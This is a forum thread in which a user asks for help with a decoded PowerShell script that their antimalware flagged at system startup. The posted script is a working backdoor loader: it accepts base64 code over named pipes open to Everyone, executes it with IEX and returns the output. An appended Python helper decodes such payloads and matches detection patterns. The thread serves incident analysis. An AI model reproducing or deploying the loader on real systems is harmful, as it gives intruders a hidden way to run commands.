NotAdmin

Members
  • Posts: 4
  • Rank: Newbie
  • Location: Italy

  1. Yes, I already used Autoruns to check for rubbish running at startup, but I didn't find any suspicious activity/process. It's really strange...
  2. Apologies if I was not clear; I will try to explain the point better. I received an alert of suspicious PowerShell execution at a certain time, and the related obfuscated command was retrieved by the antimalware (in other words, I know what was executed, but I have to understand why). So, after analysis I saw that PowerShell was triggered by cmd.exe, but no other parent processes were found because this happened at system startup, and I do not have other elements to continue the investigation (I'm thinking that something in autoexec has been compromised). In the meantime, I tried to deobfuscate the PowerShell script (base64 encoded) and I finally managed to obtain the attached commands. At the moment I know what, when, who, where, how... I need to understand why! :)
  3. Hi itman, I tried to locate the script, but PowerShell came from cmd.exe (we are talking about a Win7 environment) and no other parent processes were found. This process (cmd.exe, which executes powershell.exe) was triggered 5-6 times at system startup, without any particular "pattern" (it seems a random process): just to say, PowerShell execution detected on Monday, and then another event 4 days later, another after 7, and so on. The event viewer didn't record any particular event in these specific timeframes. N.B.: the PowerShell script was obfuscated; I decoded it and what I pasted is the clear-text command. Many many thanks!
  4. Hi all, I've detected an attempt to execute a PowerShell command on a machine and, after decoding it, I retrieved these commands:

         $pn = "awkywlhbod"
         $pm = "xnopgdzmw6"
         $sb = {
             param ($pn, $pm)
             Add-Type -assembly "System.Core"
             # first named pipe ($pn): server side, readable/writable by Everyone
             $ps = New-Object System.IO.Pipes.PipeSecurity
             $ar = New-Object System.IO.Pipes.PipeAccessRule("Everyone", "ReadWrite", "Allow")
             $ps.AddAccessRule($ar)
             $p = New-Object System.IO.Pipes.NamedPipeServerStream($pn, "InOut", 100, "Byte", "None", 1024, 1024, $ps)
             $p.WaitForConnection()
             $pr = New-Object System.IO.StreamReader($p)
             $o = $pr.ReadLine()
             $p.Dispose(); $pr.Dispose()
             # the line received on the pipe is base64-decoded and run with IEX
             $s = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($o)) | Out-String
             $o = IEX $s | Out-String
             # second named pipe ($pm): the output of IEX is written back to whoever connects
             $ps = New-Object System.IO.Pipes.PipeSecurity
             $ar = New-Object System.IO.Pipes.PipeAccessRule("Everyone", "ReadWrite", "Allow")
             $ps.AddAccessRule($ar)
             $p = New-Object System.IO.Pipes.NamedPipeServerStream($pm, "InOut", 100, "Byte", "None", 1024, 1024, $ps)
             $p.WaitForConnection()
             $pw = New-Object System.IO.StreamWriter($p)
             $pw.AutoFlush = $true
             $pw.WriteLine($o)
             $p.Dispose()
         }
         Add-Type -assembly "System.Core"
         # the script block runs as a background job; the main thread just waits 10 minutes
         $t = Start-Job -ScriptBlock $sb -ArgumentList @($pn, $pm)
         $pl = New-Object System.IO.Pipes.NamedPipeClientStream(".", $pn)
         $pp = New-Object System.IO.Pipes.NamedPipeClientStream(".", $pm)
         Start-Sleep 600
         $t.StopJob()

     Is there anyone who can help me understand what this stands for? Thank you very much in advance!!
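An added defender-side helper for the decoding step the posts describe; it is example code, not from the original post or its author. It takes a base64 PowerShell payload, handles both the UTF-16LE form that -EncodedCommand expects and a plain UTF-8 base64 script body, and reports the loader traits visible in the quoted script (IEX, FromBase64String, an Everyone-writable named pipe server, Start-Job) together with the pipe names the script serves. The indicator list and the encoded sample are constructed for this example.

```python
import base64
import re

# Indicators a defender would flag in decoded PowerShell; constructed from the
# script quoted in the post above, not an exhaustive ruleset.
INDICATORS = {
    "iex": re.compile(r"\b(IEX|Invoke-Expression)\b", re.I),
    "base64_decode": re.compile(r"FromBase64String", re.I),
    "named_pipe_server": re.compile(r"NamedPipeServerStream", re.I),
    "pipe_acl_everyone": re.compile(r'PipeAccessRule\(\s*"Everyone"', re.I),
    "background_job": re.compile(r"\bStart-Job\b", re.I),
}

def decode_powershell_b64(blob: str) -> str:
    """Decode a base64 PowerShell payload: -EncodedCommand uses UTF-16LE, a plain
    base64'd script body is usually UTF-8.  ASCII in UTF-16LE leaves every high
    byte zero, which is how the two cases are told apart here."""
    raw = base64.b64decode(blob.strip(), validate=True)
    if len(raw) >= 2 and len(raw) % 2 == 0 and raw[1::2].count(0) > len(raw) // 4:
        return raw.decode("utf-16-le")
    return raw.decode("utf-8")

def scan_script(script: str) -> dict:
    """Report which indicators fire and resolve the pipe names the script serves
    (string literals assigned to the variables passed to NamedPipeServerStream)."""
    hits = {name: bool(rx.search(script)) for name, rx in INDICATORS.items()}
    assigns = dict(re.findall(r'\$(\w+)\s*=\s*"([^"]*)"', script))
    pipe_vars = re.findall(r"NamedPipeServerStream\(\s*\$(\w+)", script)
    pipe_names = [assigns.get(v, "$" + v) for v in pipe_vars]
    return {"hits": hits, "pipe_names": pipe_names}

def analyze(blob: str) -> dict:
    """Decode then scan: what an analyst hands a captured encoded command to."""
    return scan_script(decode_powershell_b64(blob))

# Constructed sample: a trimmed stand-in for the quoted loader, encoded the way
# -EncodedCommand expects.  Not a real captured payload.
SAMPLE_SCRIPT = (
    '$pn = "pipe_in_example"\n'
    '$p = New-Object System.IO.Pipes.NamedPipeServerStream($pn,"InOut",100,"Byte","None",1024,1024,$ps)\n'
    '$s = [Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($o))\n'
    '$o = IEX $s | Out-String\n'
)
ENCODED_SAMPLE = base64.b64encode(SAMPLE_SCRIPT.encode("utf-16-le")).decode("ascii")
ENCODED_SAMPLE_UTF8 = base64.b64encode(b'Write-Host "hello"').decode("ascii")

if __name__ == "__main__":
    print(analyze(ENCODED_SAMPLE))
```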